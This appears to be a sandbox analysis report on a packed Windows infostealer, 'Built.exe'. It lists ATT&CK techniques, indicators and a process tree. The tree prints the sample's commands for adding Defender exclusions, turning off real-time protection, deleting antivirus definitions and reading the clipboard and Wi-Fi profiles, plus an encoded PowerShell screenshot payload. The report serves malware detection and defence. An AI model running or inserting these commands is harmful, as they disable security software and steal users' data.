4713e03aeb2f6a2f16fa94e86a26ce3f256a0a7085a241596ef8602b082cfc3e

Analysis

max time kernel
14s
max time network
14s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
02/02/2025, 20:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.9MB
MD5

1e646f055b5915993a83581d182dd628
SHA1

f8f1bfc49e31d220082b08e7dc725c097e9fdf11
SHA256

4713e03aeb2f6a2f16fa94e86a26ce3f256a0a7085a241596ef8602b082cfc3e
SHA512

fc36ac085e5c477a02e94e2eae0a20bf0330df36686249b6dc07832a285e95f78298968646234d20d16833414bd8f86096ab03c8ae2843ea374cac43bd4894b8
SSDEEP

98304:DDczHqdVfB2FS2/P2yyuT/9vUIdD9C+z3zO917vOTh+ezDNh7n8mJ1nmOBr9n4mf:DYQst2ybT/9bvLz3S1bA3zpn9VDhhR

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3208	powershell.exe
4104	powershell.exe
4584	powershell.exe
4500	powershell.exe
512	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1320	cmd.exe
4112	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3736	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe
3212	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1492	tasklist.exe
1560	tasklist.exe
3188	tasklist.exe
1184	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c55-21.dat	upx
behavioral2/memory/3212-25-0x00007FFF74BE0000-0x00007FFF751C9000-memory.dmp	upx
behavioral2/files/0x0007000000023c48-27.dat	upx
behavioral2/files/0x0007000000023c4f-47.dat	upx
behavioral2/files/0x0007000000023c4d-45.dat	upx
behavioral2/memory/3212-48-0x00007FFF8D8A0000-0x00007FFF8D8AF000-memory.dmp	upx
behavioral2/files/0x0007000000023c4b-43.dat	upx
behavioral2/files/0x0007000000023c4a-42.dat	upx
behavioral2/files/0x0007000000023c49-41.dat	upx
behavioral2/files/0x0007000000023c47-40.dat	upx
behavioral2/files/0x0007000000023c5a-39.dat	upx
behavioral2/files/0x0007000000023c59-38.dat	upx
behavioral2/files/0x0007000000023c58-37.dat	upx
behavioral2/files/0x0007000000023c54-34.dat	upx
behavioral2/files/0x0007000000023c52-33.dat	upx
behavioral2/files/0x0007000000023c4e-46.dat	upx
behavioral2/files/0x0007000000023c4c-44.dat	upx
behavioral2/memory/3212-30-0x00007FFF8BAA0000-0x00007FFF8BAC3000-memory.dmp	upx
behavioral2/files/0x0007000000023c53-29.dat	upx
behavioral2/memory/3212-54-0x00007FFF89F20000-0x00007FFF89F4D000-memory.dmp	upx
behavioral2/memory/3212-56-0x00007FFF89E50000-0x00007FFF89E69000-memory.dmp	upx
behavioral2/memory/3212-58-0x00007FFF83F10000-0x00007FFF83F33000-memory.dmp	upx
behavioral2/memory/3212-60-0x00007FFF748C0000-0x00007FFF74A37000-memory.dmp	upx
behavioral2/memory/3212-62-0x00007FFF83E90000-0x00007FFF83EA9000-memory.dmp	upx
behavioral2/memory/3212-64-0x00007FFF8BA90000-0x00007FFF8BA9D000-memory.dmp	upx
behavioral2/memory/3212-66-0x00007FFF83E60000-0x00007FFF83E8E000-memory.dmp	upx
behavioral2/memory/3212-74-0x00007FFF8BAA0000-0x00007FFF8BAC3000-memory.dmp	upx
behavioral2/memory/3212-73-0x00007FFF74540000-0x00007FFF748B8000-memory.dmp	upx
behavioral2/memory/3212-71-0x00007FFF83040000-0x00007FFF830F8000-memory.dmp	upx
behavioral2/memory/3212-70-0x00007FFF74BE0000-0x00007FFF751C9000-memory.dmp	upx
behavioral2/memory/3212-76-0x00007FFF83E40000-0x00007FFF83E54000-memory.dmp	upx
behavioral2/memory/3212-79-0x00007FFF88180000-0x00007FFF8818D000-memory.dmp	upx
behavioral2/memory/3212-78-0x00007FFF89F20000-0x00007FFF89F4D000-memory.dmp	upx
behavioral2/memory/3212-83-0x00007FFF89E50000-0x00007FFF89E69000-memory.dmp	upx
behavioral2/memory/3212-84-0x00007FFF73ED0000-0x00007FFF73FEC000-memory.dmp	upx
behavioral2/memory/3212-85-0x00007FFF83F10000-0x00007FFF83F33000-memory.dmp	upx
behavioral2/memory/3212-88-0x00007FFF748C0000-0x00007FFF74A37000-memory.dmp	upx
behavioral2/memory/3212-169-0x00007FFF83E90000-0x00007FFF83EA9000-memory.dmp	upx
behavioral2/memory/3212-263-0x00007FFF83E60000-0x00007FFF83E8E000-memory.dmp	upx
behavioral2/memory/3212-276-0x00007FFF83040000-0x00007FFF830F8000-memory.dmp	upx
behavioral2/memory/3212-293-0x00007FFF74540000-0x00007FFF748B8000-memory.dmp	upx
behavioral2/memory/3212-295-0x00007FFF83E40000-0x00007FFF83E54000-memory.dmp	upx
behavioral2/memory/3212-317-0x00007FFF8BAA0000-0x00007FFF8BAC3000-memory.dmp	upx
behavioral2/memory/3212-331-0x00007FFF73ED0000-0x00007FFF73FEC000-memory.dmp	upx
behavioral2/memory/3212-316-0x00007FFF74BE0000-0x00007FFF751C9000-memory.dmp	upx
behavioral2/memory/3212-322-0x00007FFF748C0000-0x00007FFF74A37000-memory.dmp	upx
behavioral2/memory/3212-332-0x00007FFF74BE0000-0x00007FFF751C9000-memory.dmp	upx
behavioral2/memory/3212-351-0x00007FFF89E50000-0x00007FFF89E69000-memory.dmp	upx
behavioral2/memory/3212-357-0x00007FFF83040000-0x00007FFF830F8000-memory.dmp	upx
behavioral2/memory/3212-356-0x00007FFF83E60000-0x00007FFF83E8E000-memory.dmp	upx
behavioral2/memory/3212-355-0x00007FFF8BA90000-0x00007FFF8BA9D000-memory.dmp	upx
behavioral2/memory/3212-354-0x00007FFF83E90000-0x00007FFF83EA9000-memory.dmp	upx
behavioral2/memory/3212-353-0x00007FFF748C0000-0x00007FFF74A37000-memory.dmp	upx
behavioral2/memory/3212-352-0x00007FFF83F10000-0x00007FFF83F33000-memory.dmp	upx
behavioral2/memory/3212-350-0x00007FFF89F20000-0x00007FFF89F4D000-memory.dmp	upx
behavioral2/memory/3212-349-0x00007FFF8D8A0000-0x00007FFF8D8AF000-memory.dmp	upx
behavioral2/memory/3212-348-0x00007FFF8BAA0000-0x00007FFF8BAC3000-memory.dmp	upx
behavioral2/memory/3212-347-0x00007FFF74540000-0x00007FFF748B8000-memory.dmp	upx
behavioral2/memory/3212-346-0x00007FFF73ED0000-0x00007FFF73FEC000-memory.dmp	upx
behavioral2/memory/3212-345-0x00007FFF88180000-0x00007FFF8818D000-memory.dmp	upx
behavioral2/memory/3212-344-0x00007FFF83E40000-0x00007FFF83E54000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2276	cmd.exe
4576	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1872	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4916	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
512	powershell.exe
512	powershell.exe
3208	powershell.exe
3208	powershell.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
4112	powershell.exe
4112	powershell.exe
3208	powershell.exe
3208	powershell.exe
2348	powershell.exe
2348	powershell.exe
2348	powershell.exe
4112	powershell.exe
4584	powershell.exe
4584	powershell.exe
2796	powershell.exe
2796	powershell.exe
4500	powershell.exe
4500	powershell.exe
2612	powershell.exe
2612	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	3188	tasklist.exe
Token: SeDebugPrivilege	3208	powershell.exe
Token: SeDebugPrivilege	1184	tasklist.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeIncreaseQuotaPrivilege	920	WMIC.exe
Token: SeSecurityPrivilege	920	WMIC.exe
Token: SeTakeOwnershipPrivilege	920	WMIC.exe
Token: SeLoadDriverPrivilege	920	WMIC.exe
Token: SeSystemProfilePrivilege	920	WMIC.exe
Token: SeSystemtimePrivilege	920	WMIC.exe
Token: SeProfSingleProcessPrivilege	920	WMIC.exe
Token: SeIncBasePriorityPrivilege	920	WMIC.exe
Token: SeCreatePagefilePrivilege	920	WMIC.exe
Token: SeBackupPrivilege	920	WMIC.exe
Token: SeRestorePrivilege	920	WMIC.exe
Token: SeShutdownPrivilege	920	WMIC.exe
Token: SeDebugPrivilege	920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	920	WMIC.exe
Token: SeRemoteShutdownPrivilege	920	WMIC.exe
Token: SeUndockPrivilege	920	WMIC.exe
Token: SeManageVolumePrivilege	920	WMIC.exe
Token: 33	920	WMIC.exe
Token: 34	920	WMIC.exe
Token: 35	920	WMIC.exe
Token: 36	920	WMIC.exe
Token: SeDebugPrivilege	1492	tasklist.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeIncreaseQuotaPrivilege	920	WMIC.exe
Token: SeSecurityPrivilege	920	WMIC.exe
Token: SeTakeOwnershipPrivilege	920	WMIC.exe
Token: SeLoadDriverPrivilege	920	WMIC.exe
Token: SeSystemProfilePrivilege	920	WMIC.exe
Token: SeSystemtimePrivilege	920	WMIC.exe
Token: SeProfSingleProcessPrivilege	920	WMIC.exe
Token: SeIncBasePriorityPrivilege	920	WMIC.exe
Token: SeCreatePagefilePrivilege	920	WMIC.exe
Token: SeBackupPrivilege	920	WMIC.exe
Token: SeRestorePrivilege	920	WMIC.exe
Token: SeShutdownPrivilege	920	WMIC.exe
Token: SeDebugPrivilege	920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	920	WMIC.exe
Token: SeRemoteShutdownPrivilege	920	WMIC.exe
Token: SeUndockPrivilege	920	WMIC.exe
Token: SeManageVolumePrivilege	920	WMIC.exe
Token: 33	920	WMIC.exe
Token: 34	920	WMIC.exe
Token: 35	920	WMIC.exe
Token: 36	920	WMIC.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	1560	tasklist.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeIncreaseQuotaPrivilege	4212	WMIC.exe
Token: SeSecurityPrivilege	4212	WMIC.exe
Token: SeTakeOwnershipPrivilege	4212	WMIC.exe
Token: SeLoadDriverPrivilege	4212	WMIC.exe
Token: SeSystemProfilePrivilege	4212	WMIC.exe
Token: SeSystemtimePrivilege	4212	WMIC.exe
Token: SeProfSingleProcessPrivilege	4212	WMIC.exe
Token: SeIncBasePriorityPrivilege	4212	WMIC.exe
Token: SeCreatePagefilePrivilege	4212	WMIC.exe
Token: SeBackupPrivilege	4212	WMIC.exe
Token: SeRestorePrivilege	4212	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5088 wrote to memory of 3212	5088	Built.exe	83
PID 5088 wrote to memory of 3212	5088	Built.exe	83
PID 3212 wrote to memory of 4700	3212	Built.exe	87
PID 3212 wrote to memory of 4700	3212	Built.exe	87
PID 3212 wrote to memory of 1044	3212	Built.exe	88
PID 3212 wrote to memory of 1044	3212	Built.exe	88
PID 3212 wrote to memory of 5072	3212	Built.exe	89
PID 3212 wrote to memory of 5072	3212	Built.exe	89
PID 1044 wrote to memory of 512	1044	cmd.exe	93
PID 1044 wrote to memory of 512	1044	cmd.exe	93
PID 3212 wrote to memory of 3812	3212	Built.exe	95
PID 3212 wrote to memory of 3812	3212	Built.exe	95
PID 3212 wrote to memory of 4188	3212	Built.exe	96
PID 3212 wrote to memory of 4188	3212	Built.exe	96
PID 4700 wrote to memory of 3208	4700	cmd.exe	99
PID 4700 wrote to memory of 3208	4700	cmd.exe	99
PID 3212 wrote to memory of 4936	3212	Built.exe	100
PID 3212 wrote to memory of 4936	3212	Built.exe	100
PID 3812 wrote to memory of 3188	3812	cmd.exe	101
PID 3812 wrote to memory of 3188	3812	cmd.exe	101
PID 5072 wrote to memory of 4104	5072	cmd.exe	102
PID 5072 wrote to memory of 4104	5072	cmd.exe	102
PID 3212 wrote to memory of 1320	3212	Built.exe	104
PID 3212 wrote to memory of 1320	3212	Built.exe	104
PID 3212 wrote to memory of 3408	3212	Built.exe	105
PID 3212 wrote to memory of 3408	3212	Built.exe	105
PID 4188 wrote to memory of 1184	4188	cmd.exe	108
PID 4188 wrote to memory of 1184	4188	cmd.exe	108
PID 3212 wrote to memory of 972	3212	Built.exe	109
PID 3212 wrote to memory of 972	3212	Built.exe	109
PID 3212 wrote to memory of 2276	3212	Built.exe	111
PID 3212 wrote to memory of 2276	3212	Built.exe	111
PID 3212 wrote to memory of 4652	3212	Built.exe	112
PID 3212 wrote to memory of 4652	3212	Built.exe	112
PID 3212 wrote to memory of 3556	3212	Built.exe	114
PID 3212 wrote to memory of 3556	3212	Built.exe	114
PID 3212 wrote to memory of 3204	3212	Built.exe	116
PID 3212 wrote to memory of 3204	3212	Built.exe	116
PID 4936 wrote to memory of 920	4936	cmd.exe	120
PID 4936 wrote to memory of 920	4936	cmd.exe	120
PID 1320 wrote to memory of 4112	1320	cmd.exe	121
PID 1320 wrote to memory of 4112	1320	cmd.exe	121
PID 972 wrote to memory of 5080	972	cmd.exe	122
PID 972 wrote to memory of 5080	972	cmd.exe	122
PID 3408 wrote to memory of 1492	3408	cmd.exe	123
PID 3408 wrote to memory of 1492	3408	cmd.exe	123
PID 2276 wrote to memory of 4576	2276	cmd.exe	124
PID 2276 wrote to memory of 4576	2276	cmd.exe	124
PID 3204 wrote to memory of 2348	3204	cmd.exe	125
PID 3204 wrote to memory of 2348	3204	cmd.exe	125
PID 4652 wrote to memory of 4916	4652	cmd.exe	126
PID 4652 wrote to memory of 4916	4652	cmd.exe	126
PID 3556 wrote to memory of 4044	3556	cmd.exe	127
PID 3556 wrote to memory of 4044	3556	cmd.exe	127
PID 3212 wrote to memory of 4656	3212	Built.exe	128
PID 3212 wrote to memory of 4656	3212	Built.exe	128
PID 4656 wrote to memory of 4372	4656	cmd.exe	130
PID 4656 wrote to memory of 4372	4656	cmd.exe	130
PID 3212 wrote to memory of 2788	3212	Built.exe	131
PID 3212 wrote to memory of 2788	3212	Built.exe	131
PID 2788 wrote to memory of 1644	2788	cmd.exe	133
PID 2788 wrote to memory of 1644	2788	cmd.exe	133
PID 3212 wrote to memory of 3216	3212	Built.exe	134
PID 3212 wrote to memory of 3216	3212	Built.exe	134

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1900	attrib.exe
2076	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5088
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‍‍  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‍‍  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3812
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4188
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3408
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:972
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2276
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4652
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvA